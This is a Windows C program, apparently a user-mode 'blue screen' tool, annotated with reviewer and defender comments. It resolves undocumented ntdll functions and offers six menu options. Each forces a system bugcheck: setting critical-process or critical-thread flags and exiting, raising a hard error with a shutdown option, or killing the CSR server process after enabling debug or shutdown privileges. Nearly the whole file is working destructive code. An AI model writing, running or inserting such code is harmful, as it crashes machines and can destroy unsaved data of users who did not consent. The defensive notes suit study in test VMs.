#include <stdio.h>
#include <windows.h>
/*
 * Hand-written copies of native (ntdll) types used by the prototypes below.
 * NOTE(review): presumably declared here because <windows.h> alone does not
 * provide them; confirm against the SDK headers in use to avoid a clash.
 */

/* Button/response sets that can be requested from NtRaiseHardError. */
typedef enum _HARDERROR_RESPONSE_OPTION {
OptionAbortRetryIgnore,
OptionOk,
OptionOkCancel,
OptionRetryCancel,
OptionYesNo,
OptionYesNoCancel,
OptionShutdownSystem /* the only value this file actually passes (CallNtRaiseHardError) */
} HARDERROR_RESPONSE_OPTION, *PHARDERROR_RESPONSE_OPTION;
/* Result written back through the last parameter of NtRaiseHardError. */
typedef enum _HARDERROR_RESPONSE {
ResponseReturnToCaller,
ResponseNotHandled,
ResponseAbort,
ResponseCancel,
ResponseIgnore,
ResponseNo,
ResponseOk,
ResponseRetry,
ResponseYes
} HARDERROR_RESPONSE, *PHARDERROR_RESPONSE;
/*
 * Counted string descriptor. In this file it only appears as a parameter type
 * in the NtRaiseHardError prototype; the single call site passes 0 for it.
 */
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
//-------------------------------------
/*
 * Function-pointer types for ntdll exports that main() resolves at run time
 * with GetProcAddress.
 *
 * NOTE(review): the native routines report an NTSTATUS, but most of these
 * typedefs declare a void return, so the callers in this file cannot tell
 * whether a call succeeded. Only the RtlAdjustPrivilege result is inspected,
 * and it is compared with 0.
 */
/* NtSetInformationProcess: (process handle, information class, buffer, buffer size). */
typedef void (__stdcall *SETP)(HANDLE a, ULONG b, PVOID c, ULONG d);
/* NtSetInformationThread: same parameter shape as SETP, but takes a thread handle. */
typedef void (__stdcall *SETT)(HANDLE, ULONG, PVOID, ULONG);
/* NtRaiseHardError: (status, 3 argument-description parameters, response option, out response). */
typedef void (__stdcall *ER)(ULONG, ULONG, PUNICODE_STRING, PVOID, HARDERROR_RESPONSE_OPTION, OUT PHARDERROR_RESPONSE);
/* RtlSetProcessIsCritical; called below as (TRUE, NULL, FALSE). */
typedef void (__stdcall *setp)(BOOLEAN, PBOOLEAN, BOOLEAN);
/* RtlSetThreadIsCritical; identical signature to setp. */
typedef void (__stdcall *sett)(BOOLEAN, PBOOLEAN, BOOLEAN);
/* RtlAdjustPrivilege: (privilege number, enable, flag passed as FALSE below, out previous state). */
typedef BOOL (__stdcall *PR)(ULONG, BOOL, BOOL, PBOOLEAN);
/* CsrGetProcessId: its result is passed to OpenProcess as a process id (CallOpenProcess). */
typedef BOOL(__stdcall *Csr)(void);
/* NOTE(review): `add` is not referenced anywhere in the visible file. */
typedef int(*add) (int a, int b);
//------------------------------------
/*
 * Run-time resolved ntdll entry points. They are file-scope globals, so they
 * are NULL until main() assigns them; every Call* helper below dereferences
 * them without a NULL check.
 */
SETP NtSetInformationProcess;
SETT NtSetInformationThread;
ER NtRaiseHardError;
setp RtlSetProcessIsCritical;
sett RtlSetThreadIsCritical;
PR RtlAdjustPrivilege;
Csr CsrGetProcessId;
/*
 * Privilege numbers handed to RtlAdjustPrivilege (SeDebugPrivilege and
 * SeShutdownPrivilege). Review note for defenders: a process enabling either
 * privilege on its own token immediately before one of the calls below is the
 * common precondition of every code path in this file, and which accounts
 * hold these privileges is controlled by user-rights assignment policy.
 */
const ULONG SE_DEBUG_PRIVILEGE = 20;
const ULONG SE_SHUTDOWN_PRIVILEGE = 19;
/*
 * Information-class values passed to NtSetInformationProcess and
 * NtSetInformationThread respectively. Each call writes a ULONG of 1,
 * i.e. it turns the "break on termination" state on for the caller itself.
 */
const int ProcessBreakOnTermination = 0x1D;
const int ThreadBreakOnTermination = 0x12;
/* One helper per menu entry in main(); definitions follow main(). */
void CallOpenProcess(void);
void CallRtlSetThreadIsCritical(void);
void CallRtlSetProcessIsCritical(void);
void CallNtSetInformationThread(void);
void CallNtSetInformationProcess(void);
void CallNtRaiseHardError(void);
/* If privilege elevation fails, right-click the program and run it as administrator. */
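/*
 * Entry point: resolves the ntdll exports used by the Call* helpers, reads a
 * menu number (1-6) from stdin and dispatches to the matching helper.
 *
 * Every helper is destructive by design: each one is a different way of
 * forcing a system bugcheck from user mode. Run only inside a disposable
 * test VM.
 *
 * Changes relative to the original:
 *  - ntdll is looked up once, with a wide literal (TEXT() only matches the
 *    W API when UNICODE is defined);
 *  - the duplicated RtlSetThreadIsCritical lookup is removed;
 *  - the program fails closed: if the module or any export cannot be
 *    resolved, nothing is dispatched, instead of calling a NULL pointer;
 *  - the scanf result is checked.
 *
 * Returns 0 after a dispatched or rejected menu choice, 1 if resolution fails.
 */
int main(void)
{
    HMODULE ntdll = GetModuleHandleW(L"ntdll");
    int d = 0;

    if (ntdll == NULL) {
        fprintf(stderr, "ntdll module handle not available\n");
        return 1;
    }

    NtSetInformationProcess = (SETP)GetProcAddress(ntdll, "NtSetInformationProcess");
    NtSetInformationThread = (SETT)GetProcAddress(ntdll, "NtSetInformationThread");
    RtlSetProcessIsCritical = (setp)GetProcAddress(ntdll, "RtlSetProcessIsCritical");
    RtlSetThreadIsCritical = (sett)GetProcAddress(ntdll, "RtlSetThreadIsCritical");
    RtlAdjustPrivilege = (PR)GetProcAddress(ntdll, "RtlAdjustPrivilege");
    NtRaiseHardError = (ER)GetProcAddress(ntdll, "NtRaiseHardError");
    CsrGetProcessId = (Csr)GetProcAddress(ntdll, "CsrGetProcessId");

    /* These are undocumented exports; refuse to continue if any is missing. */
    if (NtSetInformationProcess == NULL || NtSetInformationThread == NULL ||
        RtlSetProcessIsCritical == NULL || RtlSetThreadIsCritical == NULL ||
        RtlAdjustPrivilege == NULL || NtRaiseHardError == NULL ||
        CsrGetProcessId == NULL) {
        fprintf(stderr, "a required ntdll export could not be resolved\n");
        return 1;
    }

    /* Non-numeric input leaves the selection at 0, which the default case rejects. */
    if (scanf("%d", &d) != 1) {
        d = 0;
    }

    switch (d) {
    case 1:
        CallOpenProcess();
        break;
    case 2:
        CallRtlSetThreadIsCritical();
        break;
    case 3:
        CallRtlSetProcessIsCritical();
        break;
    case 4:
        CallNtSetInformationThread();
        break;
    case 5:
        CallNtSetInformationProcess();
        break;
    case 6:
        CallNtRaiseHardError();
        break;
    default:
        printf("输入不正确\n"); /* "invalid input" */
        break;
    }

    /* First getchar() eats the newline left behind by scanf; the second pauses. */
    getchar();
    getchar();
    return 0;
}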
/*
 * Menu option 6: enable SeShutdownPrivilege on the current process and raise
 * a hard error with OptionShutdownSystem and status 0xC0000217.
 *
 * If the privilege cannot be enabled, a message box is shown instead (its
 * text reads "privilege elevation failed, cannot blue-screen") and nothing
 * else happens.
 *
 * Review note: the function pointers are assumed to have been resolved by
 * main(); they are not checked here. TEXT() only yields a wide literal for
 * MessageBoxW when UNICODE is defined.
 */
void CallNtRaiseHardError(void)
{
    BOOLEAN previously_enabled;
    HARDERROR_RESPONSE response = ResponseYes;

    if (RtlAdjustPrivilege(SE_SHUTDOWN_PRIVILEGE, TRUE, FALSE, &previously_enabled) != 0) {
        MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
        return;
    }

    /* No parameters are attached to the error; only the status and option matter. */
    NtRaiseHardError(0xC0000217, 0, 0, 0, OptionShutdownSystem, &response);
}
/*
 * Menu option 5: enable SeDebugPrivilege, set ProcessBreakOnTermination to 1
 * on the current process, then exit the process.
 *
 * The ordering is the point of the routine: the flag is set first and the
 * process is ended immediately afterwards. On failure to enable the
 * privilege only the "privilege elevation failed, cannot blue-screen"
 * message box is shown.
 *
 * Review note for defenders: a process setting this information class on
 * itself and then exiting is the observable behaviour here; the resulting
 * crash is presumably reported as a critical-process bugcheck (confirm in a
 * test VM crash dump).
 */
void CallNtSetInformationProcess(void)
{
    BOOLEAN previously_enabled;
    ULONG break_on_termination = 1;

    if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &previously_enabled) != 0) {
        MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
        return;
    }

    NtSetInformationProcess(GetCurrentProcess(), ProcessBreakOnTermination,
                            &break_on_termination, sizeof(ULONG));
    ExitProcess(0);
}
/*
 * Menu option 4: enable SeDebugPrivilege, set ThreadBreakOnTermination to 1
 * on the current thread, then exit the process.
 *
 * Thread-level counterpart of CallNtSetInformationProcess. If the privilege
 * cannot be enabled, only the "privilege elevation failed, cannot
 * blue-screen" message box is shown.
 *
 * Review note: the status returned by NtSetInformationThread is discarded
 * (the typedef declares it void), so a rejected request is indistinguishable
 * from an accepted one at this call site.
 */
void CallNtSetInformationThread(void)
{
    BOOLEAN previously_enabled;
    ULONG break_on_termination = 1;

    if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &previously_enabled) != 0) {
        MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
        return;
    }

    NtSetInformationThread(GetCurrentThread(), ThreadBreakOnTermination,
                           &break_on_termination, sizeof(ULONG));
    ExitProcess(0);
}
/*
 * Menu option 3: enable SeDebugPrivilege, call
 * RtlSetProcessIsCritical(TRUE, NULL, FALSE) and then exit the process.
 *
 * The NULL second argument means the previous state is not requested. If the
 * privilege cannot be enabled, only the "privilege elevation failed, cannot
 * blue-screen" message box is shown.
 *
 * Review note: presumably the Rtl wrapper for the same "break on termination"
 * state that CallNtSetInformationProcess sets directly; confirm before
 * relying on that equivalence in detection logic.
 */
void CallRtlSetProcessIsCritical(void)
{
    BOOLEAN previously_enabled;

    if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &previously_enabled) != 0) {
        MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
        return;
    }

    RtlSetProcessIsCritical(TRUE, NULL, FALSE);
    ExitProcess(0);
}
/*
 * Menu option 2: enable SeDebugPrivilege, call
 * RtlSetThreadIsCritical(TRUE, NULL, FALSE) and then exit the process.
 *
 * Thread-level counterpart of CallRtlSetProcessIsCritical. If the privilege
 * cannot be enabled, only the "privilege elevation failed, cannot
 * blue-screen" message box is shown.
 */
void CallRtlSetThreadIsCritical(void)
{
    BOOLEAN previously_enabled;

    if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &previously_enabled) != 0) {
        MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
        return;
    }

    RtlSetThreadIsCritical(TRUE, NULL, FALSE);
    ExitProcess(0);
}
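/*
 * Menu option 1: enable SeDebugPrivilege, open the process whose id is
 * returned by CsrGetProcessId() with PROCESS_ALL_ACCESS, and terminate it.
 *
 * If the privilege cannot be enabled, only the "privilege elevation failed,
 * cannot blue-screen" message box is shown.
 *
 * Changes relative to the original: the OpenProcess result is checked before
 * use (the original passed a possibly NULL handle to TerminateProcess), and
 * the handle is closed afterwards instead of being leaked.
 *
 * Review note for defenders: a full-access handle request against the CSR
 * server process from an unrelated program is a high-signal event for
 * endpoint monitoring. On recent Windows versions that process may be
 * protected, in which case OpenProcess is expected to fail here (confirm on
 * the target build).
 */
void CallOpenProcess(void)
{
    BOOLEAN previously_enabled;
    HANDLE target;

    if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &previously_enabled) != 0) {
        MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
        return;
    }

    target = OpenProcess(PROCESS_ALL_ACCESS, FALSE, CsrGetProcessId());
    if (target == NULL) {
        /* Access was refused or the id was invalid; nothing to terminate or close. */
        return;
    }

    TerminateProcess(target, 0);
    CloseHandle(target);
}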
应用层蓝屏